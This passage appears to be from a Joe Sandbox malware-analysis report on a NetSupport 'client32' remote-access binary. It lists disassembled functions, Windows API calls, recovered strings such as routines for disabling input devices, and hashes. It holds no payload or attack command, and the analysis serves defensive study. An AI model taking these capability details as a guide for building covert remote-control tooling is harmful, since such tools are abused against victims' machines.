                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Delete$BitmapSelect$BitsCreate$CompatibleInfo$CursorIcon_free_malloc_memmove_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3967744211-3916222277
                                                                                                                                                                • Opcode ID: 3d62f99c9ce37d9aef3ff397a9b8879e606c38d97d0a624de454d77c33408b6f
                                                                                                                                                                • Instruction ID: 51def0c358fc3afc124783ed49e37ab26e03e79d5813580ccbe663cd6c259546
                                                                                                                                                                • Opcode Fuzzy Hash: 3d62f99c9ce37d9aef3ff397a9b8879e606c38d97d0a624de454d77c33408b6f
                                                                                                                                                                • Instruction Fuzzy Hash: 9BC15371D043299BDB24CF64CC88B99B7B9EF48304F0081EAE919AB246D774EE84CF50
                                                                                                                                                                Function 11133920 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,59FD48C0), ref: 1113398E
                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastLibraryProc$Free$CurrentLoadLocalProcessTime__wcstoi64
                                                                                                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                                                                                • API String ID: 591687743-1001504656
                                                                                                                                                                • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                                                                                • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                                                                                                • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                                                                                • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65
                                                                                                                                                                Function 11005360 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                                                                                                • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                                                                                                  • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                • wsprintfA.USER32 ref: 1100548D
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110054E2
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110054EB
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 11005502
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005508
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1100550E
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005528
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1100552E
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100553F
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100556A
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005588
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005591
                                                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                                • API String ID: 2789700732-770455996
                                                                                                                                                                • Opcode ID: 2451f95e94c9c72552f3f2c2729a503008db99330f9048a50f9573f88d595965
                                                                                                                                                                • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                                                                                                • Opcode Fuzzy Hash: 2451f95e94c9c72552f3f2c2729a503008db99330f9048a50f9573f88d595965
                                                                                                                                                                • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                                                                                                Function 11015290 Relevance: 43.7, APIs: 29, Instructions: 170COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 110152BF
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                                                                                                • _memset.LIBCMT ref: 110152E5
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                                                                                                • BeginPath.GDI32(00000000), ref: 1101532D
                                                                                                                                                                • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                                                                                                • EndPath.GDI32(00000000), ref: 11015357
                                                                                                                                                                • PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                                                                                                • CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                                                                                                • GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                                                                                                • OffsetRgn.GDI32(00000000,?,00000000), ref: 110153EA
                                                                                                                                                                • FillRgn.GDI32(00000000,00000000,?), ref: 110153F9
                                                                                                                                                                • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101540C
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 11015419
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11015423
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1101542D
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11015436
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1101543F
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11015448
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11015452
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1101545B
                                                                                                                                                                • SetBkMode.GDI32(00000000,?), ref: 11015465
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 11015479
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702029449-0
                                                                                                                                                                • Opcode ID: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                                                                                                • Instruction ID: 652d7b9cefe541cc9f67407d7bb7a055c5a4b94d45e30f14e3a138b487ffb704
                                                                                                                                                                • Opcode Fuzzy Hash: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                                                                                                • Instruction Fuzzy Hash: 0D511875A10228AFDB14DBA4CC88FAEF7B9EF89304F004199E519D7244DB74AE44CF61
                                                                                                                                                                Function 110FF3C0 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 207synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                  • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,76968400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                                                                                                • wsprintfA.USER32 ref: 110FF5BE
                                                                                                                                                                • _memset.LIBCMT ref: 110FF5CF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                                                                                                • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                                                                                                • API String ID: 137837830-2801557662
                                                                                                                                                                • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                                                                                • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                                                                                                • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                                                                                • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                                                                                                Function 11003780 Relevance: 40.7, APIs: 27, Instructions: 240COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 110037DF
                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110037FA
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 1100380D
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003824
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100383B
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 11003852
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 11003875
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100388C
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110038A3
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110038BA
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 110038D1
                                                                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 110038D8
                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FD), ref: 110038E6
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003902
                                                                                                                                                                • CreatePen.GDI32(?,00000001,00000000), ref: 1100390B
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11003919
                                                                                                                                                                • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003932
                                                                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 11003946
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11003954
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100395E
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100396C
                                                                                                                                                                • CreatePen.GDI32(?,00000001,00000000), ref: 11003975
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11003982
                                                                                                                                                                • MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100399E
                                                                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 110039B5
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 110039C3
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 110039CA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1903512896-0
                                                                                                                                                                • Opcode ID: 8760cecb2564344baf698d6dfb1889720b5fb5377f88e9846bce1803a3bf91cb
                                                                                                                                                                • Instruction ID: f431685d51201d56bfadd4982933ed8f3cc0d0135c34102d604ea9f22554572a
                                                                                                                                                                • Opcode Fuzzy Hash: 8760cecb2564344baf698d6dfb1889720b5fb5377f88e9846bce1803a3bf91cb
                                                                                                                                                                • Instruction Fuzzy Hash: D6816FB5900209AFEB14DFA5CC85EBFF7B8EF88704F104A18E611E7295D770A941CBA1
                                                                                                                                                                Function 1112B670 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 153libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(snmpapi.dll,?,00000000), ref: 1112B699
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpUtilOidCpy), ref: 1112B6C4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpUtilOidNCmp), ref: 1112B6D1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpUtilVarBindFree), ref: 1112B6DE
                                                                                                                                                                • LoadLibraryA.KERNEL32(INETMIB1.DLL), ref: 1112B70C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpExtensionInit), ref: 1112B724
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpExtensionQuery), ref: 1112B731
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1112B75B
                                                                                                                                                                • _calloc.LIBCMT ref: 1112B78B
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1112B7FD
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1112B806
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad$CountTick_calloc
                                                                                                                                                                • String ID: ..\CTL32\tcputil.c$INETMIB1.DLL$SnmpExtensionInit$SnmpExtensionQuery$SnmpUtilOidCpy$SnmpUtilOidNCmp$SnmpUtilVarBindFree$result$snmpapi.dll
                                                                                                                                                                • API String ID: 1437035542-3101287369
                                                                                                                                                                • Opcode ID: fc1fd92616015cd47e86ff9b00b755c06122618403dc2c1f491a3f92d19b084c
                                                                                                                                                                • Instruction ID: f3295d9ca5358f7e019f9eca4ce7d23819ae9b382b39dc0ae2c11714c539106e
                                                                                                                                                                • Opcode Fuzzy Hash: fc1fd92616015cd47e86ff9b00b755c06122618403dc2c1f491a3f92d19b084c
                                                                                                                                                                • Instruction Fuzzy Hash: 1141BF35A002299BDB11DFB5DCD0A9EFBB8FB88719F5000BEE81993240DA75A945CF54
                                                                                                                                                                Function 1116B96C Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116B974
                                                                                                                                                                • __mtterm.LIBCMT ref: 1116B980
                                                                                                                                                                  • Part of subcall function 1116B64B: DecodePointer.KERNEL32(00000006,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116B65C
                                                                                                                                                                  • Part of subcall function 1116B64B: TlsFree.KERNEL32(00000019,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116B676
